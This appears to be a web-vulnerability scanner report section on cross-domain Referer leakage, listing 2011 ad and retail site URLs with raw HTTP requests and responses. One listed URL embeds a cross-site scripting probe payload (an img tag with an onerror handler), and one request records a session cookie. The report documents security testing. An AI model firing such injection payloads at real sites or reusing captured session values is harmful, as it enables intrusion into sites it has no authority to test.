http://ads.pointroll.com/PortalServe/
http://afe.specificclick.net/serve/v=5
http://afe.specificclick.net/serve/v=5
http://afe.specificclick.net/serve/v=5
http://blog.harbottle.com/dm/
http://blog.harbottle.com/dm/index.php
http://clickserve.dartsearch.net/link/click
http://d7.zedo.com/jsc/d3/fl.js
http://d7.zedo.com/jsc/d3/fl.js
http://d7.zedo.com/jsc/d3/fl.js
http://d7.zedo.com/jsc/d3/fl.js
http://d7.zedo.com/jsc/d3/fl.js
http://d7.zedo.com/jsc/d3/fl.js
http://d7.zedo.com/jsc/d3/fl.js
http://d7.zedo.com/jsc/d3/fl.js
http://d7.zedo.com/jsc/d3/fl.js
http://d7.zedo.com/jsc/d3/fl.js
http://d7.zedo.com/lar/v11-001/d7/jsc/flr.js
http://data.cnbc.com/quotes/CN
http://data.cnbc.com/quotes/CN
http://data.cnbc.com/quotes/HK
http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage
http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main
http://fls.doubleclick.net/activityi
http://fls.doubleclick.net/activityi
http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071435827/
http://netsuite-www.baynote.net/baynote/tags2/guide/results-products/netsuite-www
http://netsuite-www.baynote.net/baynote/tags2/guide/results-products/netsuite-www
http://optimized-by.rubiconproject.com/a/dk.html
https://oracleus.wingateweb.com/portal/newreg.ww
http://readwriteenterprise.disqus.com/combination_widget.js
http://search.cnbc.com/main.do
http://search.oracle.com/search/search
http://serve.directdigitalllc.com/serve.php
http://serve.directdigitalllc.com/serve.php
http://serve.directdigitalllc.com/serve.php
http://serve.directdigitalllc.com/serve.php
http://serve.directdigitalllc.com/serve.php
http://serve.directdigitalllc.com/serve.php
http://serve.directdigitalllc.com/serve.php
http://serve.directdigitalllc.com/serve.php
http://serve.directdigitalllc.com/serve.php
http://serve.directdigitalllc.com/serve.php
http://sophelle.web5.hubspot.com/Default.aspx
http://sophelle.web5.hubspot.com/Default.aspx
http://thinkwrap.com/wp-content/themes/vision/library/media/js/jquery.prettyPhoto.js
http://ticker.cnbc.com/scripts/cnbc_ticker.js
http://www.atg.com/service/main.jsp
https://www.atg.com/en/password/request/
https://www.atg.com/service/main.jsp
http://www.bigcommerce.com/lp/e1-lp-ecommerce.php
http://www.cnbc.com/js/cnbc_quote_components.js
http://www.covergirl.com/__utm.gif
http://www.covergirl.com/beauty-products
http://www.csc.com/search
http://www.cvs.com/CVSApp/promoContent/promoLandingTemplate.jsp
http://www.cvs.com/CVSApp/search/search.jsp
http://www.deloitte.com/view/en_US/us/search/index.htm
http://www.deloitte.com/view/en_US/us/search/index.htm
http://www.deloitte.com/view/en_US/us/search/index.htm
http://www.deloitte.com/view/en_US/us/search/index.htm
http://www.dove.us/Products/Hair/
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.fekkai.com/
http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp
http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp
http://www.gillettevenus.com/en_US/search/index.jsp
http://www.gillettevenus.com/global/blank.html
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.googleadservices.com/pagead/conversion/1071435827/
http://www.harbottle.com/hnl/pages/hnl.php
http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf
http://www.marykay.com/default.aspx
http://www.netsuite.com/portal/seo-landing-page/ecommerce/ecommerce-2.html
http://www.oracle.com/openworld/register/packages/index.html
http://www.oracle.com/technetwork/index.html
http://www.oracle.com/us/ciocentral/index.html
http://www.oracle.com/us/go/index.html
http://www.oraclecfo.com/Authentication/Login_w.html
http://www.oraclecfo.com/Main/Solutions/Solutions_w.html
http://www.rayalab.com/
http://www.resourcepoint.net/
http://www.sapient.com/en-us/search.html
http://www.shopify.com/
http://www.tenzing.com/atg-ecommerce-hosting.asp
http://www.volusion.com/
http://www.youtube.com/embed/kPJh9FWuOks
http://www.znode.com/znode-multifront/default.aspx

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

19.1. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The page was loaded from a URL containing a query string:

http://a.tribalfusion.com/j.ad?site=cnbc&adSpace=ros&tagKey=117090495&th=37103964303&tKey=undefined&size=300x250&flashVer=10&ver=1.21&center=1&url=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Ftarget%3Dall%26keywords%3Dxss%26categories%3Dexclude&f=1&p=19075868&a=1&rnd=19083097

The response contains the following link to another domain:

http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250

Request

Response

19.2. http://a248.e.akamai.net/www.volusion.com/a1/js/js_all_min01.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a248.e.akamai.net
Path:	/www.volusion.com/a1/js/js_all_min01.js

Issue detail

The page was loaded from a URL containing a query string:

http://a248.e.akamai.net/www.volusion.com/a1/js/js_all_min01.js?4

The response contains the following links to other domains:

http://twitter.com/intent/user?screen_name=volusion
http://twitter.com/volusion
http://www.adobe.com/go/getflashplayer

Request

GET /www.volusion.com/a1/js/js_all_min01.js?4 HTTP/1.1
Host: a248.e.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.volusion.com/?_kk=%2Becommerce%20%2Bsolution&_kt=3fda914a-c56d-407d-b8c6-0b1636cef4d3&gclid=CKPJnbn4iKsCFSE8gwod-iiK3g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Expires: Thu, 15 Apr 2019 20:00:00 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR ADM TAIo PSA PSD IVA CONi TELo OUR DEL SAM OTR LEG UNI"
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:32:00 GMT
Content-Length: 90932
Connection: close

var curDomain;
setURI();

/*
* jquery.tools 1.1.2 - The missing UI library for the Web
*
* [tools.tabs-1.0.4, tools.tabs.slideshow-1.0.2, tools.tabs.history-1.0.2, tools.tooltip-1.1.3, tools
...[SNIP]...
<p>Download latest version from <a href='http://www.adobe.com/go/getflashplayer'>here</a>
...[SNIP]...
           });
           $('#tweets').html(tweets);
       },
       complete: function() {
           rollTwits();
       }
   });

   if (document.location.protocol != "https:"){
       //load twitter btn (no ssl)
       $('.twitter').html('<a href="http://twitter.com/volusion" class="twitter-follow-button" data-text-color="#FFFFFF" data-link-color="#00AEFF">Follow @volusion</a>
...[SNIP]...
);
       });
       //load blog
       $('#blog_load').rssfeed('http://onlinebusiness.volusion.com/feed/rss2', {limit: 1, header: false, date: false});
   }else{
       //load twitter btn (ssl)
       $('.twitter').html('<a href="http://twitter.com/intent/user?screen_name=volusion" class="secure-follow-button" target="_blank"><span class="s_follow">
...[SNIP]...

19.3. https://account.bigcommerce.com/cart.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://account.bigcommerce.com
Path:	/cart.php

Issue detail

The page was loaded from a URL containing a query string:

https://account.bigcommerce.com/cart.php?a=add&pid=41&configure=true

The response contains the following link to another domain:

https://www.facebook.com/plugins/likebox.php?id=165603319018&width=280&connections=0&stream=false&header=false&height=820

Request

GET /cart.php?a=add&pid=41&configure=true HTTP/1.1
Host: account.bigcommerce.com
Connection: keep-alive
Referer: https://account.bigcommerce.com/cart.php
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: roi_visitor=visitorid%3D1421498772%7Cfirstvisit%3D2011-09-06+10%3A32%3A12%7Cquery%3DATG%2Be-commerce%2Bsolutio%7Creferer%3Dwww.google.com%7Clandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; roi_attribution=firstclick%3D2011-09-06+10%3A32%3A12%7Csource%3Dgoogle%7Cmedium%3Dcpc%7Ccampaign%3D%28roi%29+ecommerce%7Cadgroup%3Decommerce+solutions%7Ckeyword%3De+commerce+solutions%7Csitelinks%3D%7Ccreative%3D%7Ctaggedquery%3DATG%2Be-commerce%2Bsolutio%7Ctaggedreferer%3Dwww.google.com%7Ctaggedlandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; PHPSESSID=7i6337nrbo47q0nk7ne0s5dboj3jrq7n; __utmz=41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utmz=^first.1331109506396:41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utma=^first.1378413506396:41658941.1556216253.1315341506.1315341506.1315341506.1; 2__utmb=^first.1315343306396:41658941.1.10.1315341506; 2__utmc=^first.1378413506396:41658941; __utma=41658941.485543067.1315341506.1315341506.1315341506.1; __utmb=41658941.2.10.1315341506; __utmc=41658941

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:38:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 33243
Connection: close
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
   "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html lang="en">
<head>
   <meta http-equiv="Content-type" content="text/html; charset=utf-8">
   <ti
...[SNIP]...
</p>

           <iframe src="https://www.facebook.com/plugins/likebox.php?id=165603319018&width=280&connections=0&stream=false&header=false&height=820" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:285px; height:62px; -moz-border-radius:5px; -webkit-border-radius:5px; background:#bed1e1; margin-bottom:20px" allowTransparency="true"></iframe>
...[SNIP]...

19.4. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.38 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N763.SpecificMedia.com/B5645537.38

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.38;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=177065%3Bb=1045312%3Bts=20110906111049%3Bdct=;ord=1315321849?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2049738/1-best_of300.jpg

Request

GET /adi/N763.SpecificMedia.com/B5645537.38;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=177065%3Bb=1045312%3Bts=20110906111049%3Bdct=;ord=1315321849? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/serve/v=5;m=3;l=4749;c=177065;b=1045312;ts=20110906111049
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 478
Date: Tue, 06 Sep 2011 15:10:51 GMT

<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b7a/4/67/%2a/d;243075555;0-0;0;70313744;4307-300/250;38606491/38624248/1;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttp://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=177065%3Bb=1045312%3Bts=20110906111049%3Bdct=http://www.devry.edu/index.html?vc=200841&sc_1=2ODNDBOBALALTDEH&WT.mc_id=FY12_OLA_DeVryBaseline_2ODNDBOBALALTDEH"><img src="http://s0.2mdn.net/viewad/2049738/1-best_of300.jpg" border=0 alt="Advertisement"></a>

19.5. http://ad.doubleclick.net/adi/N763.SpecificMedia/B5646003.2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N763.SpecificMedia/B5646003.2

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N763.SpecificMedia/B5646003.2;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=176996%3Bb=1045098%3Bts=20110906105904%3Bdct=;ord=1315321144?

The response contains the following links to other domains:

http://c.betrad.com/surly.js?;ad_w=300;ad_h=250;coid=279;nid=1909;crid=179;
http://s0.2mdn.net/2185658/Keller_Career_Builder_300x250.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N763.SpecificMedia/B5646003.2;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=176996%3Bb=1045098%3Bts=20110906105904%3Bdct=;ord=1315321144? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/serve/v=5;m=3;l=4749;c=176996;b=1045098;ts=20110906105904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6342
Date: Tue, 06 Sep 2011 14:59:06 GMT





<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
=4749%3Bc=176996%3Bb=1045098%3Bts=20110906105904%3Bdct=http://www.keller.edu/whykeller/career-advancement-support.jsp?vc=200848&sc_1=2OKNDCARSMCUSKCA&WT.mc_id=FY12_OLA_KellerBaseline_2OKNDCARSMCUSKCA"><img src="http://s0.2mdn.net/2185658/Keller_Career_Builder_300x250.jpg" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a></noscript>


<script type="text/javascript" src="http://c.betrad.com/surly.js?;ad_w=300;ad_h=250;coid=279;nid=1909;crid=179;"></script>

19.6. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/nbcu.cnbc/home_homeus

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=15;tile=15;sz=120x60;ord=774844395695?

The response contains the following link to another domain:

http://view.atdmt.com/FXM/view/308880957/direct/01/7760164

Request

GET /adj/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=15;tile=15;sz=120x60;ord=774844395695? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1661
Date: Tue, 06 Sep 2011 15:34:05 GMT

document.write('<iframe src=\"http://view.atdmt.com/FXM/iview/308880957/direct/01/7760164?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B0-0%3B1%3B62912129%3B6-120/60%3B41
...[SNIP]...
%21c%3Dhome%3B%21c%3Dhomeus%3Btandomad%3Dnone%3Bpm%3D1%3Bpos%3D15%3Btile%3D15%3Bsz%3D120x60%3B%7Eaopt%3D2/0/b7/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/FXM/go/308880957/direct/01/7760164" target="_blank"><img src="http://view.atdmt.com/FXM/view/308880957/direct/01/7760164"/></a>
...[SNIP]...

19.7. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/nbcu.cnbc/home_homeus

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=15;tile=15;sz=120x60;ord=186303742230?

The response contains the following link to another domain:

http://view.atdmt.com/FXM/view/308880957/direct/01/5096911

Request

GET /adj/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=15;tile=15;sz=120x60;ord=186303742230? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1661
Date: Tue, 06 Sep 2011 15:02:40 GMT

document.write('<iframe src=\"http://view.atdmt.com/FXM/iview/308880957/direct/01/5096911?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B0-0%3B1%3B62912129%3B6-120/60%3B41
...[SNIP]...
%21c%3Dhome%3B%21c%3Dhomeus%3Btandomad%3Dnone%3Bpm%3D1%3Bpos%3D15%3Btile%3D15%3Bsz%3D120x60%3B%7Eaopt%3D2/0/b7/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/FXM/go/308880957/direct/01/5096911" target="_blank"><img src="http://view.atdmt.com/FXM/view/308880957/direct/01/5096911"/></a>
...[SNIP]...

19.8. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/nbcu.cnbc/home_homeus

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=15;tile=15;sz=120x60;ord=82868104801?

The response contains the following link to another domain:

http://view.atdmt.com/FXM/view/308880957/direct/01/6197540

Request

GET /adj/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=15;tile=15;sz=120x60;ord=82868104801? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1661
Date: Tue, 06 Sep 2011 15:28:56 GMT

document.write('<iframe src=\"http://view.atdmt.com/FXM/iview/308880957/direct/01/6197540?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B0-0%3B1%3B62912129%3B6-120/60%3B41
...[SNIP]...
%21c%3Dhome%3B%21c%3Dhomeus%3Btandomad%3Dnone%3Bpm%3D1%3Bpos%3D15%3Btile%3D15%3Bsz%3D120x60%3B%7Eaopt%3D2/0/b7/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/FXM/go/308880957/direct/01/6197540" target="_blank"><img src="http://view.atdmt.com/FXM/view/308880957/direct/01/6197540"/></a>
...[SNIP]...

19.9. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/nbcu.cnbc/home_homeus

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;dcopt=ist;pos=3;tile=3;sz=300x250;ord=913041004911?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/697683/ag911_300_wed.jpg

Request

GET /adj/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;dcopt=ist;pos=3;tile=3;sz=300x250;ord=913041004911? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 432
Date: Tue, 06 Sep 2011 15:03:33 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b7a/0/0/%2a/z;238944754;1-0;0;62912129;4307-300/250;43736632/43754419/1;;~okv=;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;dcopt=ist;pos=3;tile=3;sz=300x250;~aopt=2/0/b7/0;~sscs=%3fhttp://www.cnbc.com/id/44037183"><img src="http://s0.2mdn.net/viewad/697683/ag911_300_wed.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

19.10. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/nbcu.cnbc/home_homeus

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=15;tile=15;sz=120x60;ord=558747671777?

The response contains the following link to another domain:

http://view.atdmt.com/FXM/view/308880957/direct/01/1049994

Request

GET /adj/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=15;tile=15;sz=120x60;ord=558747671777? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1661
Date: Tue, 06 Sep 2011 15:49:14 GMT

document.write('<iframe src=\"http://view.atdmt.com/FXM/iview/308880957/direct/01/1049994?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B0-0%3B1%3B62912129%3B6-120/60%3B41
...[SNIP]...
%21c%3Dhome%3B%21c%3Dhomeus%3Btandomad%3Dnone%3Bpm%3D1%3Bpos%3D15%3Btile%3D15%3Bsz%3D120x60%3B%7Eaopt%3D2/0/b7/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/FXM/go/308880957/direct/01/1049994" target="_blank"><img src="http://view.atdmt.com/FXM/view/308880957/direct/01/1049994"/></a>
...[SNIP]...

19.11. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/nbcu.cnbc/home_homeus

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;dcopt=ist;pos=3;tile=3;sz=300x250;ord=819761534221?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/697683/delivering_alpha_300.jpg

Request

GET /adj/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;dcopt=ist;pos=3;tile=3;sz=300x250;ord=819761534221? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 435
Date: Tue, 06 Sep 2011 14:56:36 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b7a/0/0/%2a/u;238944754;2-0;0;62912129;4307-300/250;43446029/43463816/1;;~okv=;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;dcopt=ist;pos=3;tile=3;sz=300x250;~aopt=2/0/b7/0;~sscs=%3fhttp://deliveringalpha.com/"><img src="http://s0.2mdn.net/viewad/697683/delivering_alpha_300.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

19.12. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/nbcu.cnbc/home_homeus

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=15;tile=15;sz=120x60;ord=834450440481?

The response contains the following link to another domain:

http://view.atdmt.com/FXM/view/308880957/direct/01/7533182

Request

GET /adj/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=15;tile=15;sz=120x60;ord=834450440481? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1661
Date: Tue, 06 Sep 2011 15:04:49 GMT

document.write('<iframe src=\"http://view.atdmt.com/FXM/iview/308880957/direct/01/7533182?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B0-0%3B1%3B62912129%3B6-120/60%3B41
...[SNIP]...
